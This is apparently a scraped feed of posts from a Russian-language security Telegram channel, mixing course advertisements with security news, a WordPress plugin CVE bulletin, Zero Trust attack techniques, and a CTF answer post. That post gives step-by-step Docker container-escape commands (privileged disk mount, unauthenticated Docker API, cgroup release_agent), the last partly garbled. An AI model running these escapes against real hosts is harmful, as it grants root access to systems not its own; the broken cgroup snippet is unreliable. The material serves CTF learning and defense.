🤖 AI сейчас на пике — и математика снова в центре внимания.
Одна из топовых экспертов, кто сегодня участвует на AIJ, преподаёт у нас.
Мария Тихонова — PhD по Computer Science, руководитель направления в SberAI и доцент ВШЭ. Она работает с LLM каждый день и объясняет математику так, как она реально применяется в AI.
🔥 Экспресс-курс «Математика для DS» — 8 недель, чтобы закрыть пробелы и уверенно проходить собесы.
🎁 До 30 ноября:
→ скидка 40%
→ курс «Школьная математика» в подарок при оплате
→ бесплатный тест на знание основ математики
👉 Записаться на курс
«На конференции AIJ только и разговоров, что о AI и математике. Ведь в основе генеративных моделей Gen AI лежит фундаментальная математика.»
Одна из топовых экспертов, кто сегодня участвует на AIJ, преподаёт у нас.
Мария Тихонова — PhD по Computer Science, руководитель направления в SberAI и доцент ВШЭ. Она работает с LLM каждый день и объясняет математику так, как она реально применяется в AI.
🔥 Экспресс-курс «Математика для DS» — 8 недель, чтобы закрыть пробелы и уверенно проходить собесы.
🎁 До 30 ноября:
→ скидка 40%
→ курс «Школьная математика» в подарок при оплате
→ бесплатный тест на знание основ математики
👉 Записаться на курс
❤3🥰2🤔1
Правильный ответ: ВСЕ ТРИ работают, но с нюансами!
Почему работает:
Флаг --privileged отключает изоляцию устройств. Контейнер видит все диски хоста.
Эксплойт:
Шаг 1: Смотрим доступные диски
fdisk -l
Видим /dev/sda1 (корень хоста)
Шаг 2: Монтируем
mkdir /mnt/host
mount /dev/sda1 /mnt/host
Шаг 3: Профит!
cat /mnt/host/root/flag.txt
Почему работает:
Если DOCKER_HOST открыт без TLS, можем создавать контейнеры от имени хоста.
Эксплойт:
Проверяем доступ к API
curl http://172.17.0.1:2375/version
Запускаем новый контейнер с volume хоста
docker -H tcp://172.17.0.1:2375 run -v /:/host \
-it alpine chroot /host sh
Теперь мы root на хосте!
cat /root/flag.txt
Почему работает:
Privileged-контейнер может писать в cgroup notify_on_release и выполнить код на хосте.
Эксплойт:
Создаём cgroup
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cd /tmp/cgrp
Включаем notify_on_release
echo 1 > cgroup.procs
echo 1 > notify_on_release
Пишем скрипт, который выполнится на хосте
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > release_agent
Создаём команду
cat /root/flag.txt > /output
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3🥰3
🔐 Secrets Scanning
🕵️ TruffleHog:
— Сканит Git историю, Docker образы, S3, файловые системы
— 800+ детекторов секретов с верификацией
— Находит токены AWS, GitHub, API ключи с проверкой валидности
— Интеграция в CI/CD, pre-commit hooks
— Но: много false-positive без точной настройки
🔍 Gitleaks:
— Легковесный, быстрый (Go)
— Кастомные regex правила
— SARIF отчеты для DevOps
— Меньше жрет ресурсов
— Но: нет автоматической верификации найденных секретов
❓ Чем ловите утёкшие токены:
❤️ — TruffleHog
🔥 — Gitleaks
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🐸 Библиотека хакера
#tool_vs_tool
🕵️ TruffleHog:
— Сканит Git историю, Docker образы, S3, файловые системы
— 800+ детекторов секретов с верификацией
— Находит токены AWS, GitHub, API ключи с проверкой валидности
— Интеграция в CI/CD, pre-commit hooks
— Но: много false-positive без точной настройки
🔍 Gitleaks:
— Легковесный, быстрый (Go)
— Кастомные regex правила
— SARIF отчеты для DevOps
— Меньше жрет ресурсов
— Но: нет автоматической верификации найденных секретов
❤️ — TruffleHog
🔥 — Gitleaks
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#tool_vs_tool
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2🥰2❤1
🎉 Большая распродажа Proglib Academy — минус 40% на всё!
📚 Выбирай свой курс:
▫️ «Экспресс-курс по математике для DS» — получи фундамент для построения успешной карьеры в Data Science
▫️ «Математика для DS» — для тех, кто хочет уверенно работать с данными;
▫️ «Основы Python» — чтобы начать писать код с нуля;
▫️ «Алгоритмы и структуры данных» — для будущих инженеров;
▫️ «Специалист по ИИ» или «AI-агенты», или «Машинное обучение» — для тех, кто хочет прокачаться в ИИ.
▫️ «Архитектуры и шаблоны проектирования» — чтобы писать гибкий, масштабируемый код как мидл+ разработчик.
▫️ «Основы IT для непрограммистов» — для тех, кто хочет понимать, как устроены технологии, не будучи разработчиком.
🎁 Бонусы ноября:
▫️ Розыгрыш MacBook Pro 14 — купи любой курс и пройди 2 недели обучения до 30 ноября.
▫️ Бесплатный тест по математике — за 5 минут покажет, какие темы стоит подтянуть перед DS.
👉 Выбрать курс со скидкой
📚 Выбирай свой курс:
▫️ «Экспресс-курс по математике для DS» — получи фундамент для построения успешной карьеры в Data Science
▫️ «Математика для DS» — для тех, кто хочет уверенно работать с данными;
▫️ «Основы Python» — чтобы начать писать код с нуля;
▫️ «Алгоритмы и структуры данных» — для будущих инженеров;
▫️ «Специалист по ИИ» или «AI-агенты», или «Машинное обучение» — для тех, кто хочет прокачаться в ИИ.
▫️ «Архитектуры и шаблоны проектирования» — чтобы писать гибкий, масштабируемый код как мидл+ разработчик.
▫️ «Основы IT для непрограммистов» — для тех, кто хочет понимать, как устроены технологии, не будучи разработчиком.
🎁 Бонусы ноября:
▫️ Розыгрыш MacBook Pro 14 — купи любой курс и пройди 2 недели обучения до 30 ноября.
▫️ Бесплатный тест по математике — за 5 минут покажет, какие темы стоит подтянуть перед DS.
👉 Выбрать курс со скидкой
👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁9🔥4
Это один из немногих фильмов, где атака строится не на «взломе за 30 секунд», а на реальном OSINT, социальной инженерии и тихой компрометации ПК.
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🥰3
🧨 Что стояло за этим хаосом: краткий разбор SQL Slammer
SQL Slammer стал примером того, как несколько сотен байт кода могут вывести из строя инфраструктуру. Он не шифровал данные и не ломал системы — он перегружал сети.
🔍 Почему он разнёсся за минуты:
Уязвимость находилась в SQL Server (UDP/1434).
UDP не требует соединения: один пакет — и сервер начинает рассылать червя дальше.
Каждая заражённая машина множила нагрузку, пока маршрутизаторы и каналы не начинали «сыпаться».
➡️ Почему падали даже защищённые системы:
Slammer создавал такой объём пакетов, что маршрутизаторы и каналы начинали перегружаться.
Из-за этого выходили из строя:
— банкоматы,
— авиасистемы,
— экстренные службы,
— корпоративные сети,
даже если уязвимости там уже не было.
📌 Slammer стал наглядным примером того, как сетевые атаки могут парализовать инфраструктуру быстрее, чем их успевают обнаружить.
🐸 Библиотека хакера
#zero_day_legends
SQL Slammer стал примером того, как несколько сотен байт кода могут вывести из строя инфраструктуру. Он не шифровал данные и не ломал системы — он перегружал сети.
Уязвимость находилась в SQL Server (UDP/1434).
UDP не требует соединения: один пакет — и сервер начинает рассылать червя дальше.
Каждая заражённая машина множила нагрузку, пока маршрутизаторы и каналы не начинали «сыпаться».
Slammer создавал такой объём пакетов, что маршрутизаторы и каналы начинали перегружаться.
Из-за этого выходили из строя:
— банкоматы,
— авиасистемы,
— экстренные службы,
— корпоративные сети,
даже если уязвимости там уже не было.
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰4👍2
Вышел патч для сетевого анализатора. Для ИБ-специалистов критично.
— 2 уязвимости (RCE/DoS риски при анализе вредоносного трафика)
— 20 багов стабильности
— Обновлены декодеры: HTTP/3, DNS, DTLS, KRB5, SMB, EAPOL-MKA, TCP, SNMP, VLAN
Wireshark анализирует непрове
ренный трафик. Уязвимый анализатор = компрометация рабочей станции ИБ-специалиста.
Ставим:
```shell
sudo apt update && sudo apt upgrade wireshark```
🔹 ML для старта в Data Science
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🥰2
Представьте: нужно проверить конфигурации безопасности на 200 коммутаторах. Руками — это неделя работы. Скриптом на Python — 10 минут.
→ Подключаешься к оборудованию (SSH, Telnet)
→ Собираешь конфиги через Netmiko
→ Парсишь их регулярками или TextFSM
→ Генеришь отчет в Excel
Реальные примеры, никакой воды. Плюс разделы про Jinja2 для шаблонов конфигураций и работу с базами данных.
#resourse_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥3
Zero Trust ломают не через сети, а через то, чему система уже доверяет: устройства, токены и агентов.
— компрометация «доверенного» устройства;
— подмена posture-данных (антивирус, версия ОС);
— захват активных сессий вместо паролей;
— атаки на ZTNA-клиентов и их трафик.
— подмена MDM-аттестации;
— загрузка в Safe/Recovery Mode → обход проверок;
— использование украденных корпоративных ноутбуков как легитимных туннелей;
— слабые posture-проверки, которые верят на слово агенту.
— replay действующих сессий;
— перенос device-certificate на другой хост;
— отключение TLS-pinning у агента (Frida, LLDB);
— атаки на OAuth/OIDC, где refresh-токен не привязан к железу.
ZTNA в реальных внедрениях слишком доверяет endpoint’ам. Если устройство или токен помечены как «чистые» — доступ откроется, даже если хост уже под контролем злоумышленника.
#breach_breakdown
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3👍1
cisco_cheat_sheet.zip
2 MB
Это архив из двадцати+ отдельных шпаргалок по ключевым технологиям Cisco.
Каждая — отдельный PDF на одну тему: маршрутизация (BGP, OSPF, EIGRP, RIP, IS-IS), VLAN и STP, NAT, QoS, IPv4/IPv6, Wi-Fi/802.1X, IPsec, MPLS, VoIP, ACL, First Hop Redundancy — плюс утилиты для анализа трафика (Scapy, Tcpdump, Wireshark).
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5👾1
📊 А правда, что математика в Data Science не нужна?
Нет. Без неё вы не пройдёте собес и не поймёте, почему модель ведёт себя странно. Линал, матан и вероятности — это база, без которой работа в ML превращается в угадайку.
🔥 Эту базу можно собрать за 2 месяца на экспресс-курсе «Математика для Data Science».
👩🏫 Кто ведёт курс:
→ Мария Тихонова
PhD, руководитель исследовательского направления в SberAI, доцент ВШЭ.
→ Диана Миронидис
Преподаватель ВШЭ, автор научпоп-материалов по математике для блога МТС.
→ Ксения Кондаурова
Преподаватель преподаватель T-Банка, автор курсов ЦУ и Edutoria.
→ Маргарита Бурова
Академический руководитель программ по аналитике и ML, Wildberries & Russ.
🎁 Что сейчас доступно:
→ бесплатный тест, чтобы узнать свой уровень математики;
→ скидка 40% до 30 ноября;
→ если оплатить до конца ноября, курс «Базовая математика» в подарок.
👉 Пишите менеджеру, если хотите попасть в поток
Нет. Без неё вы не пройдёте собес и не поймёте, почему модель ведёт себя странно. Линал, матан и вероятности — это база, без которой работа в ML превращается в угадайку.
🔥 Эту базу можно собрать за 2 месяца на экспресс-курсе «Математика для Data Science».
👩🏫 Кто ведёт курс:
→ Мария Тихонова
PhD, руководитель исследовательского направления в SberAI, доцент ВШЭ.
→ Диана Миронидис
Преподаватель ВШЭ, автор научпоп-материалов по математике для блога МТС.
→ Ксения Кондаурова
Преподаватель преподаватель T-Банка, автор курсов ЦУ и Edutoria.
→ Маргарита Бурова
Академический руководитель программ по аналитике и ML, Wildberries & Russ.
🎁 Что сейчас доступно:
→ бесплатный тест, чтобы узнать свой уровень математики;
→ скидка 40% до 30 ноября;
→ если оплатить до конца ноября, курс «Базовая математика» в подарок.
👉 Пишите менеджеру, если хотите попасть в поток
🥰3
🚨 WordPress плагин с бесплатными донатами
Уязвимость CVE-2025-13384 позволяет подделать любой платёж БЕЗ ДЕНЕГ. Фейковый IPN запрос → заявка помечена как «оплачена» → атакующий получает доступ/услугу бесплатно
⚠️ Кто под ударом:
CP Contact Form with PayPal (≤ 1.3.56) — плагин для форм с приёмом платежей
🔴 Почему это работает:
— Нет проверки PayPal IPN подписи
— Нет аутентификации запросов
— Любой может отправить POST на
— Система считает что деньги пришли
🎥 Что под угрозой:
— Donation формы (пожертвования)
— Payment формы (оплата услуг)
— Registration формы (регистрация с оплатой)
— Любые submission помечаются как paid
🎥 Что делать:
— Обновить плагин до версии 1.3.57+
— Через Dashboard → Plugins → Update
— Проверить логи на подозрительные IPN запросы
— Сверить платежи в PayPal с заявками на сайте
🔗 Обновить плагин
🔗 Детали уязвимости
🔹 ML для старта в Data Science
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🐸 Библиотека хакера
#cve_bulletin
Уязвимость CVE-2025-13384 позволяет подделать любой платёж БЕЗ ДЕНЕГ. Фейковый IPN запрос → заявка помечена как «оплачена» → атакующий получает доступ/услугу бесплатно
⚠️ Кто под ударом:
CP Contact Form with PayPal (≤ 1.3.56) — плагин для форм с приёмом платежей
— Нет проверки PayPal IPN подписи
— Нет аутентификации запросов
— Любой может отправить POST на
/cp_contactformpp_ipncheck— Система считает что деньги пришли
— Donation формы (пожертвования)
— Payment формы (оплата услуг)
— Registration формы (регистрация с оплатой)
— Любые submission помечаются как paid
— Обновить плагин до версии 1.3.57+
— Через Dashboard → Plugins → Update
— Проверить логи на подозрительные IPN запросы
— Сверить платежи в PayPal с заявками на сайте
🔹 ML для старта в Data Science
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#cve_bulletin
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3👍1
Как прокачиваете свои скиллы ❔
Anonymous Poll
65%
HackTheBox/TryHackMe
15%
Bug bounty программы
32%
Читаю CVE и exploit-db
15%
Реверс малвари
26%
Собственная лаба
10%
Другой вариант (напишу в комментариях)
❤6👍2
Быстрые P2P-передачи без облаков и без регистрации. AltSendme — открытый инструмент, который отправляет файлы напрямую между устройствами, шифруя всё по пути.
— Прямое P2P без хранения на серверах
— E2E-шифрование (QUIC + TLS 1.3 + BLAKE3)
— Работает в локалке и через интернет
— Любые файлы и папки, без лимитов
— Возобновление прерванных загрузок
— Очень быстро — до многогигабитных скоростей
— Нет аккаунтов, логов и трекинга
— Есть CLI и готовые билды под Win/macOS/Linux
# Отправить файл
sendme send ./video.mp4
# Получить файл по коду
sendme receive ABC-123
# Передать директорию
sendme send ./project
Чтобы передавать большие файлы быстро, приватно и без зависания на облаках. Идеально для разработчиков и тех, кто ценит безопасность.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#tool_of_the_week
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰5👍3🔥2
Google выпустил расширение Colab для VS Code: теперь облачные GPU/TPU Colab работают прямо в привычном редакторе. Для ИБ это не просто удобство — это новый рабочий инструмент.
— Изолированная среда для анализа артефактов. Можно запускать подозрительные скрипты, обрабатывать дампы, PCAPы и malware-образцы в облачном runtime, не рискуя рабочей машиной.
— Ускорение ML-детекта. SOC-аналитики и исследователи могут быстро обучать/тестировать модели аномалий и UEBA на GPU без развёртывания локальной инфраструктуры.
— Быстрые PoC и совместная работа. Ноутбук в Git + Colab runtime → удобный формат для демонстрации атак, анализа данных и верификации гипотез в команде.
— Работа с тяжёлыми наборами данных. Логи, телеметрия, форензика — всё, что обычно тормозит локально, теперь можно гонять в облаке через VS Code.
1. Установить расширение Colab в VS Code.
2. Открыть .ipynb.
3. Подключиться к облачному runtime.
Дальше — обычная работа в редакторе, но с мощностью облачной инфраструктуры.
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🥰2👍1
Исследователи из University of Vienna взяли обычную функцию WhatsApp — Contact Discovery — и через неё собрали данные 3.5 миллиарда аккаунтов. За несколько месяцев. Без единой блокировки.
Механизм простой: WhatsApp позволяет проверить, зарегистрирован ли номер в системе. Легитимная функция для синхронизации контактов.
Исследователи сгенерировали 63 миллиарда потенциальных номеров для 245 стран и начали массовую проверку через официальный API.
Скорость атаки:
→ 7,000 номеров в секунду
→ Более 100 миллионов в час
→ Первые 30 млн американских номеров за 30 минут
Защита? Отсутствовала. Никакого rate limiting, никаких блокировок.
Кампания шла с декабря 2024 по апрель 2025 — пока не собрали весь глобальный датасет.
Формально только то, что сами пользователи сделали публичным:
→ Телефонные номера (3.5 млрд активных)
→ Фото профиля у 57% аккаунтов
→ Публичные ключи шифрования и временные метки
→ Метаданные: возраст аккаунта, ОС, количество устройств
Геополитика: миллионы активных аккаунтов обнаружены в странах с запретом WhatsApp — Китай, Иран, КНДР, Мьянма. Власти этих стран преследуют за обход блокировок, теперь есть готовый список целей.
Региональные особенности: в Западной Африке 80% профилей были публичными — максимальная утечка метаданных. В других регионах показатели ниже, но общий объём критичен.
Потенциал для атак: база из 3.5 млрд номеров с привязкой к метаданным идеальна для таргетированного фишинга, SIM-swap и социальной инженерии. 9% датасета — WhatsApp Business аккаунты с расширенной информацией о компаниях.
Детальный отчёт Meta* получила в августе 2025. Первые меры внедрили в сентябре, полную митигацию — в октябре.
Исследователи удалили датасет после анализа и получили баунти через официальную программу. Доказательств эксплуатации реальными злоумышленниками не найдено.
*Корпорация Meta признана в РФ экстремистской
#breach_breakdown
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3🤔2😢2👍1🥱1